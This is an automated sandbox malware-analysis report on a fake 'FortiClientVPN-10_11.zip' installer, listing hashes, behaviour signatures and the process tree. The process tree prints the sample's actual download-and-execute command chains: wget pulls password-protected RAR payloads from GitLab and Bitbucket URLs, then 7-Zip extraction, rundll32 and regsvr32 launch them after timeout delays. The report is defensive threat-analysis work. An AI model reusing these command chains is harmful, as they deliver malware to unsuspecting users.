Overview

overview

8

Static

static

FortiClien...11.zip

windows7-x64

8

FortiClien...11.zip

windows10-2004-x64

8

Analysis

  • max time kernel
    167s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    16/12/2022, 16:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    FortiClientVPN-10_11.zip

  • Size

    115.0MB

  • MD5

    fee389057573b6496b3c2bdcd69102be

  • SHA1

    a344e37e1045c780cad9681818056820980cd716

  • SHA256

    8e1226ecf81fb863a95dfea31603172473ed8a5d301f185927732e4ae0066814

  • SHA512

    a44afb6140e1d084616b54f40d21142d8b4f2fb82dedc9ab1e4a2a0fc18f18c1a05a167806b7a66a50c958d71cd207efd6551ce73535b07867ad927103b198be

  • SSDEEP

    3145728:TNAOLDyOLNXhcrZOLmKiOL7OLUOLDOLjOLdOLW:TNfvir/KC

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 4 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\FortiClientVPN-10_11.zip
    1⤵
      PID:1380
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      1⤵
        PID:1224
      • C:\Windows\system32\AUDIODG.EXE
        C:\Windows\system32\AUDIODG.EXE 0x54c
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:580
      • C:\Program Files\7-Zip\7zFM.exe
        "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\FortiClientVPN-10_11.zip"
        1⤵
          PID:1652
          • C:\Users\Admin\AppData\Local\Temp\7zO476A1A0D\FortiClientVPN.exe
            "C:\Users\Admin\AppData\Local\Temp\7zO476A1A0D\FortiClientVPN.exe"
            2⤵
              PID:1176
          • C:\Users\Admin\Desktop\FortiClientVPN.exe
            "C:\Users\Admin\Desktop\FortiClientVPN.exe"
            1⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1116
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /K >nul timeout /t 300 /nobreak & start /wait /min C:\Users\Admin\AppData\Roaming\DirectX\wget.exe -q --no-check-certificate "https://gitlab.com/michal63roberts63/soft/-/raw/main/DirectXbin.rar" -P C:\Users\Admin\AppData\Roaming\DirectX & >nul timeout /t 8 /nobreak & start /wait /min C:\Users\Admin\AppData\Roaming\DirectX\7z.exe x -y C:\Users\Admin\AppData\Roaming\DirectX\DirectXbin.rar -p2022 -oC:\Users\Admin\AppData\Roaming\DirectX & >nul timeout /t 5 /nobreak & start /wait /min C:\Users\Admin\AppData\Roaming\DirectX\7z.exe x -y C:\Users\Admin\AppData\Roaming\DirectX\DirectX32.rar -p2022 -oC:\Users\Admin\AppData\Roaming\DirectX & >nul timeout /t 5 /nobreak & start /min C:\Users\Admin\AppData\Roaming\DirectX\DirectX32.exe & >nul timeout /t 5 /nobreak & start /wait /min C:\Users\Admin\AppData\Roaming\DirectX\7z.exe x -y C:\Users\Admin\AppData\Roaming\DirectX\DirectX64.rar -p2022 -oC:\Users\Admin\AppData\Roaming\DirectX & >nul timeout /t 10 /nobreak & start /min rundll32 C:\Users\Admin\AppData\Roaming\DirectX\DirectX.dll DirectX & EXIT
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1924
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 300 /nobreak
                3⤵
                • Delays execution with timeout.exe
                PID:1980
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /K >nul timeout /t 90 /nobreak & start .\data\AppInfo\setup.exe & EXIT
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1712
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 90 /nobreak
                3⤵
                • Delays execution with timeout.exe
                PID:1056
              • C:\Users\Admin\Desktop\data\AppInfo\setup.exe
                .\data\AppInfo\setup.exe
                3⤵
                  PID:324
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" get-childitem C:\Users\Admin\AppData\Roaming\DirectX | unblock-file
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:544
              • C:\Users\Admin\AppData\Roaming\DirectX\wget.exe
                "C:\Users\Admin\AppData\Roaming\DirectX\wget.exe" ping https://bitbucket.org/soft-here/soft/downloads/DirectXbin.rar -P C:\Users\Admin\AppData\Roaming
                2⤵
                • Executes dropped EXE
                PID:1888
              • C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe
                "C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe" x -y -p2022 C:\Users\Admin\AppData\Roaming\DirectXbin.rar C:\Users\Admin\AppData\Roaming
                2⤵
                • Executes dropped EXE
                PID:1568
              • C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe
                "C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe" x -y -p2022 C:\Users\Admin\AppData\Roaming\DirectX.rar C:\Users\Admin\AppData\Roaming
                2⤵
                • Executes dropped EXE
                PID:1228
              • C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe
                "C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe" x -y -p2022 C:\Users\Admin\AppData\Roaming\DirectX64.rar C:\Users\Admin\AppData\Roaming
                2⤵
                • Executes dropped EXE
                PID:1504
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /K >nul timeout /t 7 /nobreak & regsvr32 /s C:\Users\Admin\AppData\Roaming\DirectX.dll & >nul timeout /t 5 /nobreak & EXIT
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:620
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 7 /nobreak
                  3⤵
                  • Delays execution with timeout.exe
                  PID:1072
                • C:\Windows\SysWOW64\regsvr32.exe
                  regsvr32 /s C:\Users\Admin\AppData\Roaming\DirectX.dll
                  3⤵
                    PID:1580
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 5 /nobreak
                    3⤵
                    • Delays execution with timeout.exe
                    PID:108

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Roaming\DirectX\WinRAR.exe
                Filesize

                2.1MB

                MD5

                f59f4f7bea12dd7c8d44f0a717c21c8e

                SHA1

                17629ccb3bd555b72a4432876145707613100b3e

                SHA256

                f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

                SHA512

                44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

                Download Submit

              • C:\Users\Admin\AppData\Roaming\DirectX\WinRAR.exe
                Filesize

                2.1MB

                MD5

                f59f4f7bea12dd7c8d44f0a717c21c8e

                SHA1

                17629ccb3bd555b72a4432876145707613100b3e

                SHA256

                f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

                SHA512

                44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

                Download Submit

              • C:\Users\Admin\AppData\Roaming\DirectX\WinRAR.exe
                Filesize

                2.1MB

                MD5

                f59f4f7bea12dd7c8d44f0a717c21c8e

                SHA1

                17629ccb3bd555b72a4432876145707613100b3e

                SHA256

                f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

                SHA512

                44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

                Download Submit

              • C:\Users\Admin\AppData\Roaming\DirectX\wget.exe
                Filesize

                4.9MB

                MD5

                8c04808e4ba12cb793cf661fbbf6c2a0

                SHA1

                bdfdb50c5f251628c332042f85e8dd8cf5f650e3

                SHA256

                a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

                SHA512

                9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

                Download Submit

              • C:\Users\Admin\AppData\Roaming\WinRAR\version.dat
                Filesize

                12B

                MD5

                6ae6991da8cd865bad3784053ab9319c

                SHA1

                d38f9c2552d929684c6c8ab85f3b0db95157ee13

                SHA256

                c34d82a75118f5b5c9719df9b8a9ce7d83b945c60ee0157b650e504e17d664bf

                SHA512

                23c8a32767c27693dc7417d5292fb09235c7c65bafda672c017c75a47fafcbaad1ffe5ff1bfc22e8d05c5bb40477ede1a07849e20a296931e5a2cff379903f16

                Download Submit

              • \Users\Admin\AppData\Roaming\DirectX\WinRAR.exe
                Filesize

                2.1MB

                MD5

                f59f4f7bea12dd7c8d44f0a717c21c8e

                SHA1

                17629ccb3bd555b72a4432876145707613100b3e

                SHA256

                f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4

                SHA512

                44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

                Download Submit

              • \Users\Admin\AppData\Roaming\DirectX\wget.exe
                Filesize

                4.9MB

                MD5

                8c04808e4ba12cb793cf661fbbf6c2a0

                SHA1

                bdfdb50c5f251628c332042f85e8dd8cf5f650e3

                SHA256

                a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

                SHA512

                9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

                Download Submit

              • \Users\Admin\AppData\Roaming\DirectX\wget.exe
                Filesize

                4.9MB

                MD5

                8c04808e4ba12cb793cf661fbbf6c2a0

                SHA1

                bdfdb50c5f251628c332042f85e8dd8cf5f650e3

                SHA256

                a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272

                SHA512

                9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

                Download Submit

              • memory/544-63-0x0000000073160000-0x000000007370B000-memory.dmp

                Filesize

                5.7MB

                Download

              • memory/544-64-0x0000000073160000-0x000000007370B000-memory.dmp

                Filesize

                5.7MB

                Download

              • memory/1176-55-0x0000000075E81000-0x0000000075E83000-memory.dmp

                Filesize

                8KB

                Download

              • memory/1224-54-0x000007FEFB9A1000-0x000007FEFB9A3000-memory.dmp

                Filesize

                8KB

                Download